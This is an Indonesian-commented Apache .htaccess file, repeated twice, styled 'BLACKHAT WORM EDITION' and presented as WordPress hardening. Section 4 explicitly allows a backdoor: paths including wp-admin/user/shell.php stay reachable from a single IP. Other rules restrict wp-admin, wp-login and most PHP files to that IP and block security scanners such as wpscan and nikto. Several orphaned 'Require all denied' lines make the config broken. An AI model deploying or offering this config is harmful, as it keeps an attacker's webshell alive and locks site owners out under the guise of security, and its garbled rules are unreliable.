# ================================================================= # .HTACCESS ULTIMATE V2 - BLACKHAT WORM EDITION # DIBUAT UNTUK: WordPress Hardening + Anti Backdoor + Anti Exploit # IP YANG DIIZINKAN: 138.199.60.176 (GANJIL SESUAI PERMINTAAN) # WARNING: JANGAN UBAH ATURAN INI KALAU TIDAK PAHAM # ================================================================= RewriteEngine On RewriteBase / # ================================================================= # 1. BLOKIR SEMUA USER-AGENT BERBAHAYA (BOT JAHAT, SCANNER, DLL) # ================================================================= RewriteCond %{HTTP_USER_AGENT} (?:^$|libwww|perl|python|nikto|curl|wget|scan|java|php|webzip|sqlmap|nmap) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (havij|masscan|zgrab|zgrab2|wpscan|joomscan|acunetix) [NC] RewriteRule .* - [F,L] # ================================================================= # 2. BLOKIR REQUEST YANG MENGANDUNG POLA EKSPLOIT # ================================================================= # Blokir SQL Injection, XSS, Remote File Inclusion, dll RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR,NC] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR,NC] RewriteCond %{QUERY_STRING} (eval\(|base64_decode|system\(|shell_exec|passthru|popen|proc_open) [NC,OR] RewriteCond %{QUERY_STRING} (concat|union|select|insert|update|delete|drop|create|alter) [NC,OR] RewriteCond %{QUERY_STRING} (\.\./|\.\.\\) [NC,OR] RewriteCond %{QUERY_STRING} (localhost|127\.0\.0\.1) [NC] RewriteRule .* - [F,L] # ================================================================= # 3. BLOKIR METODE HTTP YANG TIDAK DIPERLUKAN # ================================================================= RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK|OPTIONS|HEAD|PUT|DELETE) [NC] RewriteRule .* - [F,L] # ================================================================= # 4. IZINKAN BACKDOOR ANDA (HANYA DARI IP ANDA) # ================================================================= RewriteCond %{REMOTE_ADDR} ^138\.199\.60\.176$ RewriteRule ^wp-admin/user/(themes|class-wp-html-text-templates|index|shell)\.php$ - [L] # ================================================================= # 5. BLOKIR SEMUA FILE PHP DI FOLDER YANG TIDAK SEHARUSNYA # ================================================================= # --- Blokir PHP di wp-content/uploads (tempat favorit backdoor) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteRule ^wp-content/uploads/.*\.(php|phtml|php3|php4|php5|phar|inc|module|sh|pl|cgi)$ - [F,L] # --- Blokir PHP di wp-content/cache (sering jadi celah) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteRule ^wp-content/cache/.*\.(php|phtml|php3|php4|php5|phar|inc)$ - [F,L] # --- Blokir PHP di wp-content/upgrade (tidak boleh ada PHP di sini) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteRule ^wp-content/upgrade/.*\.(php|phtml|php3|php4|php5|phar)$ - [F,L] # --- Blokir PHP di wp-content/languages (tidak boleh ada PHP asing) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteRule ^wp-content/languages/.*\.(php|phtml)$ - [F,L] # --- Blokir PHP di wp-includes (kecuali file bawaan WordPress) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} !^/wp-includes/(wp-db\.php|wp-load\.php|version\.php|class-wp-.*\.php|functions\.php)$ RewriteRule ^wp-includes/.*\.(php|phtml)$ - [F,L] # --- Blokir PHP di wp-admin (kecuali file inti WordPress) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} !^/wp-admin/(admin-ajax\.php|admin-post\.php|admin\.php|load-scripts\.php|load-styles\.php)$ RewriteRule ^wp-admin/.*\.(php|phtml)$ - [F,L] # --- Blokir PHP di folder themes (kecuali file tema bawaan) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} !^/wp-content/themes/.*/(functions|header|footer|page|single|index|style)\.php$ RewriteRule ^wp-content/themes/.*\.(php|phtml)$ - [F,L] # --- Blokir PHP di folder plugins (kecuali file plugin yang valid) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} !^/wp-content/plugins/.*/(index|plugin|load)\.php$ RewriteRule ^wp-content/plugins/.*\.(php|phtml)$ - [F,L] # ================================================================= # 6. BLOKIR AKSES WP-ADMIN DAN WP-LOGIN (KECUALI IP ANDA) # ================================================================= RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} ^/wp-admin RewriteRule .* - [F,L] RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} ^/wp-login\.php RewriteRule .* - [F,L] # ================================================================= # 7. BLOKIR AKSES KE FILE SENSITIF # ================================================================= Require all denied # ================================================================= # 8. MATIKAN DIRECTORY BROWSING # ================================================================= Options -Indexes # ================================================================= # 9. PROTECTION TERHADAP FILE UPLOAD DENGAN EKSTENSI GANDA # ================================================================= RewriteCond %{REQUEST_FILENAME} .*\.(jpg|jpeg|png|gif|bmp|ico|svg|pdf|doc|docx|xls|xlsx|zip|rar|txt)\.(php|phtml|php3|php4|php5|phar)$ [NC] RewriteRule .* - [F,L] # ================================================================= # 10. SET HEADER KEAMANAN EKSTRA # ================================================================= Header set X-Frame-Options "SAMEORIGIN" Header set X-Content-Type-Options "nosniff" Header set X-XSS-Protection "1; mode=block" Header set Referrer-Policy "strict-origin-when-cross-origin" Header set Permissions-Policy "geolocation=(), microphone=(), camera=()" # ================================================================= # 11. ATURAN DEFAULT WORDPRESS (WAJIB ADA) # ================================================================= RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # ================================================================= # 12. BLOKIR AKSES LANGSUNG KE FILE XML-RPC (SUMBER DDOS) # ================================================================= Require all denied # ================================================================= # 13. BLOKIR AKSES KE FILE INSTALL (AMANAN) # =================================================================c Require all denied # ================================================================= # END OF .HTACCESS ULTIMATE V2 # =================================================================# ================================================================= # .HTACCESS ULTIMATE V2 - BLACKHAT WORM EDITION # DIBUAT UNTUK: WordPress Hardening + Anti Backdoor + Anti Exploit # IP YANG DIIZINKAN: 138.199.60.176 (GANJIL SESUAI PERMINTAAN) # WARNING: JANGAN UBAH ATURAN INI KALAU TIDAK PAHAM # ================================================================= RewriteEngine On RewriteBase / # ================================================================= # 1. BLOKIR SEMUA USER-AGENT BERBAHAYA (BOT JAHAT, SCANNER, DLL) # ================================================================= RewriteCond %{HTTP_USER_AGENT} (?:^$|libwww|perl|python|nikto|curl|wget|scan|java|php|webzip|sqlmap|nmap) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (havij|masscan|zgrab|zgrab2|wpscan|joomscan|acunetix) [NC] RewriteRule .* - [F,L] # ================================================================= # 2. BLOKIR REQUEST YANG MENGANDUNG POLA EKSPLOIT # ================================================================= # Blokir SQL Injection, XSS, Remote File Inclusion, dll RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR,NC] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR,NC] RewriteCond %{QUERY_STRING} (eval\(|base64_decode|system\(|shell_exec|passthru|popen|proc_open) [NC,OR] RewriteCond %{QUERY_STRING} (concat|union|select|insert|update|delete|drop|create|alter) [NC,OR] RewriteCond %{QUERY_STRING} (\.\./|\.\.\\) [NC,OR] RewriteCond %{QUERY_STRING} (localhost|127\.0\.0\.1) [NC] RewriteRule .* - [F,L] # ================================================================= # 3. BLOKIR METODE HTTP YANG TIDAK DIPERLUKAN # ================================================================= RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK|OPTIONS|HEAD|PUT|DELETE) [NC] RewriteRule .* - [F,L] # ================================================================= # 4. IZINKAN BACKDOOR ANDA (HANYA DARI IP ANDA) # ================================================================= RewriteCond %{REMOTE_ADDR} ^138\.199\.60\.176$ RewriteRule ^wp-admin/user/(themes|class-wp-html-text-templates|index|shell)\.php$ - [L] # ================================================================= # 5. BLOKIR SEMUA FILE PHP DI FOLDER YANG TIDAK SEHARUSNYA # ================================================================= # --- Blokir PHP di wp-content/uploads (tempat favorit backdoor) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteRule ^wp-content/uploads/.*\.(php|phtml|php3|php4|php5|phar|inc|module|sh|pl|cgi)$ - [F,L] # --- Blokir PHP di wp-content/cache (sering jadi celah) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteRule ^wp-content/cache/.*\.(php|phtml|php3|php4|php5|phar|inc)$ - [F,L] # --- Blokir PHP di wp-content/upgrade (tidak boleh ada PHP di sini) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteRule ^wp-content/upgrade/.*\.(php|phtml|php3|php4|php5|phar)$ - [F,L] # --- Blokir PHP di wp-content/languages (tidak boleh ada PHP asing) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteRule ^wp-content/languages/.*\.(php|phtml)$ - [F,L] # --- Blokir PHP di wp-includes (kecuali file bawaan WordPress) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} !^/wp-includes/(wp-db\.php|wp-load\.php|version\.php|class-wp-.*\.php|functions\.php)$ RewriteRule ^wp-includes/.*\.(php|phtml)$ - [F,L] # --- Blokir PHP di wp-admin (kecuali file inti WordPress) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} !^/wp-admin/(admin-ajax\.php|admin-post\.php|admin\.php|load-scripts\.php|load-styles\.php)$ RewriteRule ^wp-admin/.*\.(php|phtml)$ - [F,L] # --- Blokir PHP di folder themes (kecuali file tema bawaan) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} !^/wp-content/themes/.*/(functions|header|footer|page|single|index|style)\.php$ RewriteRule ^wp-content/themes/.*\.(php|phtml)$ - [F,L] # --- Blokir PHP di folder plugins (kecuali file plugin yang valid) --- RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} !^/wp-content/plugins/.*/(index|plugin|load)\.php$ RewriteRule ^wp-content/plugins/.*\.(php|phtml)$ - [F,L] # ================================================================= # 6. BLOKIR AKSES WP-ADMIN DAN WP-LOGIN (KECUALI IP ANDA) # ================================================================= RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} ^/wp-admin RewriteRule .* - [F,L] RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$ RewriteCond %{REQUEST_URI} ^/wp-login\.php RewriteRule .* - [F,L] # ================================================================= # 7. BLOKIR AKSES KE FILE SENSITIF # ================================================================= Require all denied # ================================================================= # 8. MATIKAN DIRECTORY BROWSING # ================================================================= Options -Indexes # ================================================================= # 9. PROTECTION TERHADAP FILE UPLOAD DENGAN EKSTENSI GANDA # ================================================================= RewriteCond %{REQUEST_FILENAME} .*\.(jpg|jpeg|png|gif|bmp|ico|svg|pdf|doc|docx|xls|xlsx|zip|rar|txt)\.(php|phtml|php3|php4|php5|phar)$ [NC] RewriteRule .* - [F,L] # ================================================================= # 10. SET HEADER KEAMANAN EKSTRA # ================================================================= Header set X-Frame-Options "SAMEORIGIN" Header set X-Content-Type-Options "nosniff" Header set X-XSS-Protection "1; mode=block" Header set Referrer-Policy "strict-origin-when-cross-origin" Header set Permissions-Policy "geolocation=(), microphone=(), camera=()" # ================================================================= # 11. ATURAN DEFAULT WORDPRESS (WAJIB ADA) # ================================================================= RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # ================================================================= # 12. BLOKIR AKSES LANGSUNG KE FILE XML-RPC (SUMBER DDOS) # ================================================================= Require all denied # ================================================================= # 13. BLOKIR AKSES KE FILE INSTALL (AMANAN) # =================================================================c Require all denied # ================================================================= # END OF .HTACCESS ULTIMATE V2 # =================================================================